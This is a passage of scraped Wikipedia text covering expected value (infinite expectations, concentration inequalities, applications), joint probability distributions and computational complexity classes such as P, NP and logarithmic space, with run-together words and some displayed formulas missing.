are followed, anynonnegativerandom variable whatsoever can be given an unambiguous expected value; whenever absolute convergence fails, then the expected value can be defined as+∞. The second fundamental observation is that any random variable can be written as the difference of two nonnegative random variables. Given a random variableX, one defines thepositive and negative partsbyX+= max(X, 0)andX−= −min(X, 0). These are nonnegative random variables, and it can be directly checked thatX=X+−X−. SinceE[X+]andE[X−]are both then defined as either nonnegative numbers or+∞, it is then natural to define:E⁡[X]={E⁡[X+]−E⁡[X−]ifE⁡[X+]<∞andE⁡[X−]<∞;+∞ifE⁡[X+]=∞andE⁡[X−]<∞;−∞ifE⁡[X+]<∞andE⁡[X−]=∞;undefinedifE⁡[X+]=∞andE⁡[X−]=∞.{\displaystyle \operatorname {E} [X]={\begin{cases}\operatorname {E} [X^{+}]-\operatorname {E} [X^{-}]&{\text{if }}\operatorname {E} [X^{+}]<\infty {\text{ and }}\operatorname {E} [X^{-}]<\infty ;\\+\infty &{\text{if }}\operatorname {E} [X^{+}]=\infty {\text{ and }}\operatorname {E} [X^{-}]<\infty ;\\-\infty &{\text{if }}\operatorname {E} [X^{+}]<\infty {\text{ and }}\operatorname {E} [X^{-}]=\infty ;\\{\text{undefined}}&{\text{if }}\operatorname {E} [X^{+}]=\infty {\text{ and }}\operatorname {E} [X^{-}]=\infty .\end{cases}}} According to this definition,E[X]exists and is finite if and only ifE[X+]andE[X−]are both finite. Due to the formula|X| =X++X−, this is the case if and only ifE|X|is finite, and this is equivalent to the absolute convergence conditions in the definitions above. As such, the present considerations do not define finite expected values in any cases not previously considered; they are only useful for infinite expectations. The following table gives the expected values of some commonly occurringprobability distributions. The third column gives the expected values both in the form immediately given by the definition, as well as in the simplified form obtained by computation therefrom. The details of these computations, which are not always straightforward, can be found in the indicated references. The basic properties below (and their names in bold) replicate or follow immediately from those ofLebesgue integral. Note that the letters "a.s." stand for "almost surely"—a central property of the Lebesgue integral. Basically, one says that an inequality likeX≥0{\displaystyle X\geq 0}is true almost surely, when the probability measure attributes zero-mass to the complementary event{X<0}.{\displaystyle \left\{X<0\right\}.} Concentration inequalitiescontrol the likelihood of a random variable taking on large values.Markov's inequalityis among the best-known and simplest to prove: for anonnegativerandom variableXand any positive numbera, it states that[37]P⁡(X≥a)≤E⁡[X]a.{\displaystyle \operatorname {P} (X\geq a)\leq {\frac {\operatorname {E} [X]}{a}}.} IfXis any random variable with finite expectation, then Markov's inequality may be applied to the random variable|X−E[X]|2to obtainChebyshev's inequalityP⁡(|X−E[X]|≥a)≤Var⁡[X]a2,{\displaystyle \operatorname {P} (|X-{\text{E}}[X]|\geq a)\leq {\frac {\operatorname {Var} [X]}{a^{2}}},}whereVaris thevariance.[37]These inequalities are significant for their nearly complete lack of conditional assumptions. For example, for any random variable with finite expectation, the Chebyshev inequality implies that there is at least a 75% probability of an outcome being within twostandard deviationsof the expected value. However, in special cases the Markov and Chebyshev inequalities often give much weaker information than is otherwise available. For example, in the case of an unweighted dice, Chebyshev's inequality says that odds of rolling between 1 and 6 is at least 53%; in reality, the odds are of course 100%.[38]TheKolmogorov inequalityextends the Chebyshev inequality to the context of sums of random variables.[39] The following three inequalities are of fundamental importance in the field ofmathematical analysisand its applications to probability theory. The Hölder and Minkowski inequalities can be extended to generalmeasure spaces, and are often given in that context. By contrast, the Jensen inequality is special to the case of probability spaces. In general, it is not the case thatE⁡[Xn]→E⁡[X]{\displaystyle \operatorname {E} [X_{n}]\to \operatorname {E} [X]}even ifXn→X{\displaystyle X_{n}\to X}pointwise. Thus, one cannot interchange limits and expectation, without additional conditions on the random variables. To see this, letU{\displaystyle U}be a random variable distributed uniformly on[0,1].{\displaystyle [0,1].}Forn≥1,{\displaystyle n\geq 1,}define a sequence of random variablesXn=n⋅1{U∈(0,1n)},{\displaystyle X_{n}=n\cdot \mathbf {1} \left\{U\in \left(0,{\tfrac {1}{n}}\right)\right\},}with1{A}{\displaystyle \mathbf {1} \{A\}}being the indicator function of the eventA.{\displaystyle A.}Then, it follows thatXn→0{\displaystyle X_{n}\to 0}pointwise. But,E⁡[Xn]=n⋅Pr(U∈[0,1n])=n⋅1n=1{\displaystyle \operatorname {E} [X_{n}]=n\cdot \Pr \left(U\in \left[0,{\tfrac {1}{n}}\right]\right)=n\cdot {\tfrac {1}{n}}=1}for eachn.{\displaystyle n.}Hence,limn→∞E⁡[Xn]=1≠0=E⁡[limn→∞Xn].{\displaystyle \lim _{n\to \infty }\operatorname {E} [X_{n}]=1\neq 0=\operatorname {E} \left[\lim _{n\to \infty }X_{n}\right].} Analogously, for general sequence of random variables{Yn:n≥0},{\displaystyle \{Y_{n}:n\geq 0\},}the expected value operator is notσ{\displaystyle \sigma }-additive, i.e.E⁡[∑n=0∞Yn]≠∑n=0∞E⁡[Yn].{\displaystyle \operatorname {E} \left[\sum _{n=0}^{\infty }Y_{n}\right]\neq \sum _{n=0}^{\infty }\operatorname {E} [Y_{n}].} An example is easily obtained by settingY0=X1{\displaystyle Y_{0}=X_{1}}andYn=Xn+1−Xn{\displaystyle Y_{n}=X_{n+1}-X_{n}}forn≥1,{\displaystyle n\geq 1,}whereXn{\displaystyle X_{n}}is as in the previous example. A number of convergence results specify exact conditions which allow one to interchange limits and expectations, as specified below. The probability density functionfX{\displaystyle f_{X}}of a scalar random variableX{\displaystyle X}is related to itscharacteristic functionφX{\displaystyle \varphi _{X}}by the inversion formula:fX(x)=12π∫Re−itxφX(t)dt.{\displaystyle f_{X}(x)={\frac {1}{2\pi }}\int _{\mathbb {R} }e^{-itx}\varphi _{X}(t)\,dt.} For the expected value ofg(X){\displaystyle g(X)}(whereg:R→R{\displaystyle g:{\mathbb {R} }\to {\mathbb {R} }}is aBorel function), we can use this inversion formula to obtainE⁡[g(X)]=12π∫Rg(x)[∫Re−itxφX(t)dt]dx.{\displaystyle \operatorname {E} [g(X)]={\frac {1}{2\pi }}\int _{\mathbb {R} }g(x)\left[\int _{\mathbb {R} }e^{-itx}\varphi _{X}(t)\,dt\right]dx.} IfE⁡[g(X)]{\displaystyle \operatorname {E} [g(X)]}is finite, changing the order of integration, we get, in accordance withFubini–Tonelli theorem,E⁡[g(X)]=12π∫RG(t)φX(t)dt,{\displaystyle \operatorname {E} [g(X)]={\frac {1}{2\pi }}\int _{\mathbb {R} }G(t)\varphi _{X}(t)\,dt,}whereG(t)=∫Rg(x)e−itxdx{\displaystyle G(t)=\int _{\mathbb {R} }g(x)e^{-itx}\,dx}is theFourier transformofg(x).{\displaystyle g(x).}The expression forE⁡[g(X)]{\displaystyle \operatorname {E} [g(X)]}also follows directly from thePlancherel theorem. The expectation of a random variable plays an important role in a variety of contexts. Instatistics, where one seeksestimatesfor unknownparametersbased on available data gained fromsamples, thesample meanserves as an estimate for the expectation, and is itself a random variable. In such settings, the sample mean is considered to meet the desirable criterion for a "good" estimator in beingunbiased; that is, the expected value of the estimate is equal to thetrue valueof the underlying parameter. For a different example, indecision theory, an agent making an optimal choice in the context of incomplete information is often assumed to maximize the expected value of theirutility function. It is possible to construct an expected value equal to the probability of an event by taking the expectation of anindicator functionthat is one if the event has occurred and zero otherwise. This relationship can be used to translate properties of expected values into properties of probabilities, e.g. using thelaw of large numbersto justify estimating probabilities byfrequencies. The expected values of the powers ofXare called themomentsofX; themoments about the meanofXare expected values of powers ofX− E[X]. The moments of some random variables can be used to specify their distributions, via theirmoment generating functions. To empirically estimate the expected value of a random variable, one repeatedly measures observations of the variable and computes thearithmetic meanof the results. If the expected value exists, this procedure estimates the true expected value in an unbiased manner and has the property of minimizing the sum of the squares of theresiduals(the sum of the squared differences between the observations and the estimate). The law of large numbers demonstrates (under fairly mild conditions) that, as thesizeof the sample gets larger, thevarianceof this estimate gets smaller. This property is often exploited in a wide variety of applications, including general problems ofstatistical estimationandmachine learning, to estimate (probabilistic) quantities of interest viaMonte Carlo methods, since most quantities of interest can be written in terms of expectation, e.g.P⁡(X∈A)=E⁡[1A],{\displaystyle \operatorname {P} ({X\in {\mathcal {A}}})=\operatorname {E} [{\mathbf {1} }_{\mathcal {A}}],}where1A{\displaystyle {\mathbf {1} }_{\mathcal {A}}}is the indicator function of the setA.{\displaystyle {\mathcal {A}}.} Inclassical mechanics, thecenter of massis an analogous concept to expectation. For example, supposeXis a discrete random variable with valuesxiand corresponding probabilitiespi.Now consider a weightless rod on which are placed weights, at locationsxialong the rod and having massespi(whose sum is one). The point at which the rod balances is E[X]. Expected values can also be used to compute the variance, by means of the computational formula for the varianceVar⁡(X)=E⁡[X2]−(E⁡[X])2.{\displaystyle \operatorname {Var} (X)=\operatorname {E} [X^{2}]-(\operatorname {E} [X])^{2}.} A very important application of the expectation value is in the field ofquantum mechanics. Theexpectation value of a quantum mechanical operatorA^{\displaystyle {\hat {A}}}operating on aquantum statevector|ψ⟩{\displaystyle |\psi \rangle }is written as⟨A^⟩=⟨ψ|A^|ψ⟩.{\displaystyle \langle {\hat {A}}\rangle =\langle \psi |{\hat {A}}|\psi \rangle .}TheuncertaintyinA^{\displaystyle {\hat {A}}}can be calculated by the formula(ΔA)2=⟨A^2⟩−⟨A^⟩2{\displaystyle (\Delta A)^{2}=\langle {\hat {A}}^{2}\rangle -\langle {\hat {A}}\rangle ^{2}}.
https://en.wikipedia.org/wiki/Expected_value
Givenrandom variablesX,Y,…{\displaystyle X,Y,\ldots }, that are defined on the same[1]probability space, themultivariateorjoint probability distributionforX,Y,…{\displaystyle X,Y,\ldots }is aprobability distributionthat gives the probability that each ofX,Y,…{\displaystyle X,Y,\ldots }falls in any particular range or discrete set of values specified for that variable. In the case of only two random variables, this is called abivariate distribution, but the concept generalizes to any number of random variables. The joint probability distribution can be expressed in terms of a jointcumulative distribution functionand either in terms of a jointprobability density function(in the case ofcontinuous variables) or jointprobability mass function(in the case ofdiscretevariables). These in turn can be used to find two other types of distributions: themarginal distributiongiving the probabilities for any one of the variables with no reference to any specific ranges of values for the other variables, and theconditional probability distributiongiving the probabilities for any subset of the variables conditional on particular values of the remaining variables. Each of two urns contains twice as many red balls as blue balls, and no others, and one ball is randomly selected from each urn, with the two draws independent of each other. LetA{\displaystyle A}andB{\displaystyle B}be discrete random variables associated with the outcomes of the draw from the first urn and second urn respectively. The probability of drawing a red ball from either of the urns is⁠2/3⁠, and the probability of drawing a blue ball is⁠1/3⁠. The joint probability distribution is presented in the following table: Each of the four inner cells shows the probability of a particular combination of results from the two draws; these probabilities are the joint distribution. In any one cell the probability of a particular combination occurring is (since the draws are independent) the product of the probability of the specified result for A and the probability of the specified result for B. The probabilities in these four cells sum to 1, as with all probability distributions. Moreover, the final row and the final column give themarginal probability distributionfor A and the marginal probability distribution for B respectively. For example, for A the first of these cells gives the sum of the probabilities for A being red, regardless of which possibility for B in the column above the cell occurs, as⁠2/3⁠. Thus the marginal probability distribution forA{\displaystyle A}givesA{\displaystyle A}'s probabilitiesunconditionalonB{\displaystyle B}, in a margin of the table. Consider the flip of twofair coins; letA{\displaystyle A}andB{\displaystyle B}be discrete random variables associated with the outcomes of the first and second coin flips respectively. Each coin flip is aBernoulli trialand has aBernoulli distribution. If a coin displays "heads" then the associated random variable takes the value 1, and it takes the value 0 otherwise. The probability of each of these outcomes is⁠1/2⁠, so the marginal (unconditional) density functions are The joint probability mass function ofA{\displaystyle A}andB{\displaystyle B}defines probabilities for each pair of outcomes. All possible outcomes are Since each outcome is equally likely the joint probability mass function becomes Since the coin flips are independent, the joint probability mass function is the product of the marginals: Consider the roll of a fairdieand letA=1{\displaystyle A=1}if the number is even (i.e. 2, 4, or 6) andA=0{\displaystyle A=0}otherwise. Furthermore, letB=1{\displaystyle B=1}if the number is prime (i.e. 2, 3, or 5) andB=0{\displaystyle B=0}otherwise. Then, the joint distribution ofA{\displaystyle A}andB{\displaystyle B}, expressed as a probability mass function, is These probabilities necessarily sum to 1, since the probability ofsomecombination ofA{\displaystyle A}andB{\displaystyle B}occurring is 1. If more than one random variable is defined in a random experiment, it is important to distinguish between the joint probability distribution of X and Y and the probability distribution of each variable individually. The individual probability distribution of a random variable is referred to as its marginal probability distribution. In general, the marginal probability distribution of X can be determined from the joint probability distribution of X and other random variables. If the joint probability density function of random variable X and Y isfX,Y(x,y){\displaystyle f_{X,Y}(x,y)}, the marginal probability density function of X and Y, which defines themarginal distribution, is given by: fX(x)=∫fX,Y(x,y)dy{\displaystyle f_{X}(x)=\int f_{X,Y}(x,y)\;dy}fY(y)=∫fX,Y(x,y)dx{\displaystyle f_{Y}(y)=\int f_{X,Y}(x,y)\;dx} where the first integral is over all points in the range of (X,Y) for which X=x and the second integral is over all points in the range of (X,Y) for which Y=y.[2] For a pair of random variablesX,Y{\displaystyle X,Y}, the joint cumulative distribution function (CDF)FX,Y{\displaystyle F_{X,Y}}is given by[3]: p. 89 where the right-hand side represents theprobabilitythat the random variableX{\displaystyle X}takes on a value less than or equal tox{\displaystyle x}andthatY{\displaystyle Y}takes on a value less than or equal toy{\displaystyle y}. ForN{\displaystyle N}random variablesX1,…,XN{\displaystyle X_{1},\ldots ,X_{N}}, the joint CDFFX1,…,XN{\displaystyle F_{X_{1},\ldots ,X_{N}}}is given by Interpreting theN{\displaystyle N}random variables as arandom vectorX=(X1,…,XN)T{\displaystyle \mathbf {X} =(X_{1},\ldots ,X_{N})^{T}}yields a shorter notation: The jointprobability mass functionof twodiscrete random variablesX,Y{\displaystyle X,Y}is: or written in terms of conditional distributions whereP(Y=y∣X=x){\displaystyle \mathrm {P} (Y=y\mid X=x)}is theprobabilityofY=y{\displaystyle Y=y}given thatX=x{\displaystyle X=x}. The generalization of the preceding two-variable case is the joint probability distribution ofn{\displaystyle n\,}discrete random variablesX1,X2,…,Xn{\displaystyle X_{1},X_{2},\dots ,X_{n}}which is: or equivalently This identity is known as thechain rule of probability. Since these are probabilities, in the two-variable case which generalizes forn{\displaystyle n\,}discrete random variablesX1,X2,…,Xn{\displaystyle X_{1},X_{2},\dots ,X_{n}}to Thejointprobability density functionfX,Y(x,y){\displaystyle f_{X,Y}(x,y)}for twocontinuous random variablesis defined as the derivative of the joint cumulative distribution function (seeEq.1): This is equal to: wherefY∣X(y∣x){\displaystyle f_{Y\mid X}(y\mid x)}andfX∣Y(x∣y){\displaystyle f_{X\mid Y}(x\mid y)}are theconditional distributionsofY{\displaystyle Y}givenX=x{\displaystyle X=x}and ofX{\displaystyle X}givenY=y{\displaystyle Y=y}respectively, andfX(x){\displaystyle f_{X}(x)}andfY(y){\displaystyle f_{Y}(y)}are themarginal distributionsforX{\displaystyle X}andY{\displaystyle Y}respectively. The definition extends naturally to more than two random variables: Again, since these are probability distributions, one has respectively The "mixed joint density" may be defined where one or more random variables are continuous and the other random variables are discrete. With one variable of each type One example of a situation in which one may wish to find the cumulative distribution of one random variable which is continuous and another random variable which is discrete arises when one wishes to use alogistic regressionin predicting the probability of a binary outcome Y conditional on the value of a continuously distributed outcomeX{\displaystyle X}. Onemustuse the "mixed" joint density when finding the cumulative distribution of this binary outcome because the input variables(X,Y){\displaystyle (X,Y)}were initially defined in such a way that one could not collectively assign it either a probability density function or a probability mass function. Formally,fX,Y(x,y){\displaystyle f_{X,Y}(x,y)}is the probability density function of(X,Y){\displaystyle (X,Y)}with respect to theproduct measureon the respectivesupportsofX{\displaystyle X}andY{\displaystyle Y}. Either of these two decompositions can then be used to recover the joint cumulative distribution function: The definition generalizes to a mixture of arbitrary numbers of discrete and continuous random variables. In general two random variablesX{\displaystyle X}andY{\displaystyle Y}areindependentif and only if the joint cumulative distribution function satisfies Two discrete random variablesX{\displaystyle X}andY{\displaystyle Y}are independent if and only if the joint probability mass function satisfies for allx{\displaystyle x}andy{\displaystyle y}. While the number of independent random events grows, the related joint probability value decreases rapidly to zero, according to a negative exponential law. Similarly, two absolutely continuous random variables are independent if and only if for allx{\displaystyle x}andy{\displaystyle y}. This means that acquiring any information about the value of one or more of the random variables leads to a conditional distribution of any other variable that is identical to its unconditional (marginal) distribution; thus no variable provides any information about any other variable. If a subsetA{\displaystyle A}of the variablesX1,⋯,Xn{\displaystyle X_{1},\cdots ,X_{n}}isconditionally dependentgiven another subsetB{\displaystyle B}of these variables, then the probability mass function of the joint distribution isP(X1,…,Xn){\displaystyle \mathrm {P} (X_{1},\ldots ,X_{n})}.P(X1,…,Xn){\displaystyle \mathrm {P} (X_{1},\ldots ,X_{n})}is equal toP(B)⋅P(A∣B){\displaystyle P(B)\cdot P(A\mid B)}. Therefore, it can be efficiently represented by the lower-dimensional probability distributionsP(B){\displaystyle P(B)}andP(A∣B){\displaystyle P(A\mid B)}. Such conditional independence relations can be represented with aBayesian networkorcopula functions. When two or more random variables are defined on a probability space, it is useful to describe how they vary together; that is, it is useful to measure the relationship between the variables. A common measure of the relationship between two random variables is the covariance. Covariance is a measure of linear relationship between the random variables. If the relationship between the random variables is nonlinear, the covariance might not be sensitive to the relationship, which means, it does not relate the correlation between two variables. The covariance between the random variablesX{\displaystyle X}andY{\displaystyle Y}is[4] There is another measure of the relationship between two random variables that is often easier to interpret than the covariance. The correlation just scales the covariance by the product of the standard deviation of each variable. Consequently, the correlation is a dimensionless quantity that can be used to compare the linear relationships between pairs of variables in different units. If the points in the joint probability distribution of X and Y that receive positive probability tend to fall along a line of positive (or negative) slope, ρXYis near +1 (or −1). If ρXYequals +1 or −1, it can be shown that the points in the joint probability distribution that receive positive probability fall exactly along a straight line. Two random variables with nonzero correlation are said to be correlated. Similar to covariance, the correlation is a measure of the linear relationship between random variables. The correlation coefficient between the random variablesX{\displaystyle X}andY{\displaystyle Y}is Named joint distributions that arise frequently in statistics include themultivariate normal distribution, themultivariate stable distribution, themultinomial distribution, thenegative multinomial distribution, themultivariate hypergeometric distribution, and theelliptical distribution.
https://en.wikipedia.org/wiki/Joint_probability_distribution
Incomputational complexity theory, acomplexity classis asetofcomputational problems"of related resource-basedcomplexity".[1]The two most commonly analyzed resources aretimeandmemory. In general, a complexity class is defined in terms of a type of computational problem, amodel of computation, and a bounded resource liketimeormemory. In particular, most complexity classes consist ofdecision problemsthat are solvable with aTuring machine, and are differentiated by their time or space (memory) requirements. For instance, the classPis the set of decision problems solvable by a deterministic Turing machine inpolynomial time. There are, however, many complexity classes defined in terms of other types of problems (e.g.counting problemsandfunction problems) and using other models of computation (e.g.probabilistic Turing machines,interactive proof systems,Boolean circuits, andquantum computers). The study of the relationships between complexity classes is a major area of research intheoretical computer science. There are often general hierarchies of complexity classes; for example, it is known that a number of fundamental time and space complexity classes relate to each other in the following way:L⊆NL⊆P⊆NP⊆PSPACE⊆EXPTIME⊆NEXPTIME⊆EXPSPACE(where ⊆ denotes thesubsetrelation). However, many relationships are not yet known; for example, one of the most famousopen problemsin computer science concerns whetherPequalsNP. The relationships between classes often answer questions about the fundamental nature of computation. ThePversusNPproblem, for instance, is directly related to questions of whethernondeterminismadds any computational power to computers and whether problems having solutions that can be quickly checked for correctness can also be quickly solved. Complexity classes aresetsof relatedcomputational problems. They are defined in terms of the computational difficulty of solving the problems contained within them with respect to particular computational resources like time or memory. More formally, the definition of a complexity class consists of three things: a type of computational problem, a model of computation, and a bounded computational resource. In particular, most complexity classes consist ofdecision problemsthat can be solved by aTuring machinewith boundedtimeorspaceresources. For example, the complexity classPis defined as the set ofdecision problemsthat can be solved by adeterministic Turing machineinpolynomial time. Intuitively, acomputational problemis just a question that can be solved by analgorithm. For example, "is thenatural numbern{\displaystyle n}prime?" is a computational problem. A computational problem is mathematically represented as thesetof answers to the problem. In the primality example, the problem (call itPRIME{\displaystyle {\texttt {PRIME}}}) is represented by the set of all natural numbers that are prime:PRIME={n∈N|nis prime}{\displaystyle {\texttt {PRIME}}=\{n\in \mathbb {N} |n{\text{ is prime}}\}}. In the theory of computation, these answers are represented asstrings; for example, in the primality example the natural numbers could be represented as strings ofbitsthat representbinary numbers. For this reason, computational problems are often synonymously referred to as languages, since strings of bits representformal languages(a concept borrowed fromlinguistics); for example, saying that thePRIME{\displaystyle {\texttt {PRIME}}}problem is in the complexity classPis equivalent to saying that the languagePRIME{\displaystyle {\texttt {PRIME}}}is inP. The most commonly analyzed problems in theoretical computer science aredecision problems—the kinds of problems that can be posed asyes–no questions. The primality example above, for instance, is an example of a decision problem as it can be represented by the yes–no question "is thenatural numbern{\displaystyle n}prime". In terms of the theory of computation, a decision problem is represented as the set of input strings that a computer running a correctalgorithmwould answer "yes" to. In the primality example,PRIME{\displaystyle {\texttt {PRIME}}}is the set of strings representing natural numbers that, when input into a computer running an algorithm that correctlytests for primality, the algorithm answers "yes, this number is prime". This "yes-no" format is often equivalently stated as "accept-reject"; that is, an algorithm "accepts" an input string if the answer to the decision problem is "yes" and "rejects" if the answer is "no". While some problems cannot easily be expressed as decision problems, they nonetheless encompass a broad range of computational problems.[2]Other types of problems that certain complexity classes are defined in terms of include: To make concrete the notion of a "computer", in theoretical computer science problems are analyzed in the context of acomputational model. Computational models make exact the notions of computational resources like "time" and "memory". Incomputational complexity theory, complexity classes deal with theinherentresource requirements of problems and not the resource requirements that depend upon how a physical computer is constructed. For example, in the real world different computers may require different amounts of time and memory to solve the same problem because of the way that they have been engineered. By providing an abstract mathematical representations of computers, computational models abstract away superfluous complexities of the real world (like differences inprocessorspeed) that obstruct an understanding of fundamental principles. The most commonly used computational model is theTuring machine. While other models exist and many complexity classes are defined in terms of them (see section"Other models of computation"), the Turing machine is used to define most basic complexity classes. With the Turing machine, instead of using standard units of time like the second (which make it impossible to disentangle running time from the speed of physical hardware) and standard units of memory likebytes, the notion of time is abstracted as the number of elementary steps that a Turing machine takes to solve a problem and the notion of memory is abstracted as the number of cells that are used on the machine's tape. These are explained in greater detail below. It is also possible to use theBlum axiomsto define complexity classes without referring to a concretecomputational model, but this approach is less frequently used in complexity theory. ATuring machineis a mathematical model of a general computing machine. It is the most commonly used model in complexity theory, owing in large part to the fact that it is believed to be as powerful as any other model of computation and is easy to analyze mathematically. Importantly, it is believed that if there exists an algorithm that solves a particular problem then there also exists a Turing machine that solves that same problem (this is known as theChurch–Turing thesis); this means that it is believed thateveryalgorithm can be represented as a Turing machine. Mechanically, a Turing machine (TM) manipulates symbols (generally restricted to the bits 0 and 1 to provide an intuitive connection to real-life computers) contained on an infinitely long strip of tape. The TM can read and write, one at a time, using a tape head. Operation is fully determined by a finite set of elementary instructions such as "in state 42, if the symbol seen is 0, write a 1; if the symbol seen is 1, change into state 17; in state 17, if the symbol seen is 0, write a 1 and change to state 6". The Turing machine starts with only the input string on its tape and blanks everywhere else. The TM accepts the input if it enters a designated accept state and rejects the input if it enters a reject state. The deterministic Turing machine (DTM) is the most basic type of Turing machine. It uses a fixed set of rules to determine its future actions (which is why it is called "deterministic"). A computational problem can then be defined in terms of a Turing machine as the set of input strings that a particular Turing machine accepts. For example, the primality problemPRIME{\displaystyle {\texttt {PRIME}}}from above is the set of strings (representing natural numbers) that a Turing machine running an algorithm that correctlytests for primalityaccepts. A Turing machine is said torecognizea language (recall that "problem" and "language" are largely synonymous in computability and complexity theory) if it accepts all inputs that are in the language and is said todecidea language if it additionally rejects all inputs that are not in the language (certain inputs may cause a Turing machine to run forever, sodecidabilityplaces the additional constraint overrecognizabilitythat the Turing machine must halt on all inputs). A Turing machine that "solves" a problem is generally meant to mean one that decides the language. Turing machines enable intuitive notions of "time" and "space". Thetime complexityof a TM on a particular input is the number of elementary steps that the Turing machine takes to reach either an accept or reject state. Thespace complexityis the number of cells on its tape that it uses to reach either an accept or reject state. The deterministic Turing machine (DTM) is a variant of the nondeterministic Turing machine (NTM). Intuitively, an NTM is just a regular Turing machine that has the added capability of being able to explore multiple possible future actions from a given state, and "choosing" a branch that accepts (if any accept). That is, while a DTM must follow only one branch of computation, an NTM can be imagined as a computation tree, branching into many possible computational pathways at each step (see image). If at least one branch of the tree halts with an "accept" condition, then the NTM accepts the input. In this way, an NTM can be thought of as simultaneously exploring all computational possibilities in parallel and selecting an accepting branch.[3]NTMs are not meant to be physically realizable models, they are simply theoretically interesting abstract machines that give rise to a number of interesting complexity classes (which often do have physically realizable equivalent definitions). Thetime complexityof an NTM is the maximum number of steps that the NTM uses onanybranch of its computation.[4]Similarly, thespace complexityof an NTM is the maximum number of cells that the NTM uses on any branch of its computation. DTMs can be viewed as a special case of NTMs that do not make use of the power of nondeterminism. Hence, every computation that can be carried out by a DTM can also be carried out by an equivalent NTM. It is also possible to simulate any NTM using a DTM (the DTM will simply compute every possible computational branch one-by-one). Hence, the two are equivalent in terms of computability. However, simulating an NTM with a DTM often requires greater time and/or memory resources; as will be seen, how significant this slowdown is for certain classes of computational problems is an important question in computational complexity theory. Complexity classes group computational problems by their resource requirements. To do this, computational problems are differentiated byupper boundson the maximum amount of resources that the most efficient algorithm takes to solve them. More specifically, complexity classes are concerned with therate of growthin the resources required to solve particular computational problems as the input size increases. For example, the amount of time it takes to solve problems in the complexity classPgrows at apolynomialrate as the input size increases, which is comparatively slow compared to problems in the exponential complexity classEXPTIME(or more accurately, for problems inEXPTIMEthat are outside ofP, sinceP⊆EXPTIME{\displaystyle {\mathsf {P}}\subseteq {\mathsf {EXPTIME}}}). Note that the study of complexity classes is intended primarily to understand theinherentcomplexity required to solve computational problems. Complexity theorists are thus generally concerned with finding the smallest complexity class that a problem falls into and are therefore concerned with identifying which class a computational problem falls into using themost efficientalgorithm. There may be an algorithm, for instance, that solves a particular problem in exponential time, but if the most efficient algorithm for solving this problem runs in polynomial time then the inherent time complexity of that problem is better described as polynomial. Thetime complexityof an algorithm with respect to the Turing machine model is the number of steps it takes for a Turing machine to run an algorithm on a given input size. Formally, the time complexity for an algorithm implemented with a Turing machineM{\displaystyle M}is defined as the functiontM:N→N{\displaystyle t_{M}:\mathbb {N} \to \mathbb {N} }, wheretM(n){\displaystyle t_{M}(n)}is the maximum number of steps thatM{\displaystyle M}takes on any input of lengthn{\displaystyle n}. In computational complexity theory, theoretical computer scientists are concerned less with particular runtime values and more with the general class of functions that the time complexity function falls into. For instance, is the time complexity function apolynomial? Alogarithmic function? Anexponential function? Or another kind of function? Thespace complexityof an algorithm with respect to the Turing machine model is the number of cells on the Turing machine's tape that are required to run an algorithm on a given input size. Formally, the space complexity of an algorithm implemented with a Turing machineM{\displaystyle M}is defined as the functionsM:N→N{\displaystyle s_{M}:\mathbb {N} \to \mathbb {N} }, wheresM(n){\displaystyle s_{M}(n)}is the maximum number of cells thatM{\displaystyle M}uses on any input of lengthn{\displaystyle n}. Complexity classes are often defined using granular sets of complexity classes calledDTIMEandNTIME(for time complexity) andDSPACEandNSPACE(for space complexity). Usingbig O notation, they are defined as follows: Pis the class of problems that are solvable by adeterministic Turing machineinpolynomial timeandNPis the class of problems that are solvable by anondeterministic Turing machinein polynomial time. Or more formally, Pis often said to be the class of problems that can be solved "quickly" or "efficiently" by a deterministic computer, since thetime complexityof solving a problem inPincreases relatively slowly with the input size. An important characteristic of the classNPis that it can be equivalently defined as the class of problems whose solutions areverifiableby a deterministic Turing machine in polynomial time. That is, a language is inNPif there exists adeterministicpolynomial time Turing machine, referred to as the verifier, that takes as input a stringw{\displaystyle w}anda polynomial-sizecertificatestringc{\displaystyle c}, and acceptsw{\displaystyle w}ifw{\displaystyle w}is in the language and rejectsw{\displaystyle w}ifw{\displaystyle w}is not in the language. Intuitively, the certificate acts as aproofthat the inputw{\displaystyle w}is in the language. Formally:[5] This equivalence between the nondeterministic definition and the verifier definition highlights a fundamental connection betweennondeterminismand solution verifiability. Furthermore, it also provides a useful method for proving that a language is inNP—simply identify a suitable certificate and show that it can be verified in polynomial time. While there might seem to be an obvious difference between the class of problems that are efficiently solvable and the class of problems whose solutions are merely efficiently checkable,PandNPare actually at the center of one of the most famous unsolved problems in computer science: thePversusNPproblem. While it is known thatP⊆NP{\displaystyle {\mathsf {P}}\subseteq {\mathsf {NP}}}(intuitively, deterministic Turing machines are just a subclass of nondeterministic Turing machines that don't make use of their nondeterminism; or under the verifier definition,Pis the class of problems whose polynomial time verifiers need only receive the empty string as their certificate), it is not known whetherNPis strictly larger thanP. IfP=NP, then it follows that nondeterminism providesno additional computational powerover determinism with regards to the ability to quickly find a solution to a problem; that is, being able to exploreall possible branchesof computation providesat mosta polynomial speedup over being able to explore only a single branch. Furthermore, it would follow that if there exists a proof for a problem instance and that proof can be quickly be checked for correctness (that is, if the problem is inNP), then there also exists an algorithm that can quicklyconstructthat proof (that is, the problem is inP).[6]However, the overwhelming majority of computer scientists believe thatP≠NP{\displaystyle {\mathsf {P}}\neq {\mathsf {NP}}},[7]and mostcryptographic schemesemployed today rely on the assumption thatP≠NP{\displaystyle {\mathsf {P}}\neq {\mathsf {NP}}}.[8] EXPTIME(sometimes shortened toEXP) is the class of decision problems solvable by a deterministic Turing machine in exponential time andNEXPTIME(sometimes shortened toNEXP) is the class of decision problems solvable by a nondeterministic Turing machine in exponential time. Or more formally, EXPTIMEis a strict superset ofPandNEXPTIMEis a strict superset ofNP. It is further the case thatEXPTIME⊆{\displaystyle \subseteq }NEXPTIME. It is not known whether this is proper, but ifP=NPthenEXPTIMEmust equalNEXPTIME. While it is possible to definelogarithmictime complexity classes, these are extremely narrow classes as sublinear times do not even enable a Turing machine to read the entire input (becauselog⁡n<n{\displaystyle \log n<n}).[a][9]However, there are a meaningful number of problems that can be solved in logarithmic space. The definitions of these classes require atwo-tape Turing machineso that it is possible for the machine to store the entire input (it can be shown that in terms ofcomputabilitythe two-tape Turing machine is equivalent to the single-tape Turing machine).[10]In the two-tape Turing machine model, one tape is the input tape, which is read-only. The other is the work tape, which allows both reading and writing and is the tape on which the Turing machine performs computations. The space complexity of the Turing machine is measured as the number of cells that are used on the work tape. L(sometimes lengthened toLOGSPACE) is then defined as the class of problems solvable in logarithmic space on a deterministic Turing machine andNL(sometimes lengthened toNLOGSPACE) is the class of problems solvable in logarithmic space on a nondeterministic Turing machine. Or more formally,[10] It is known 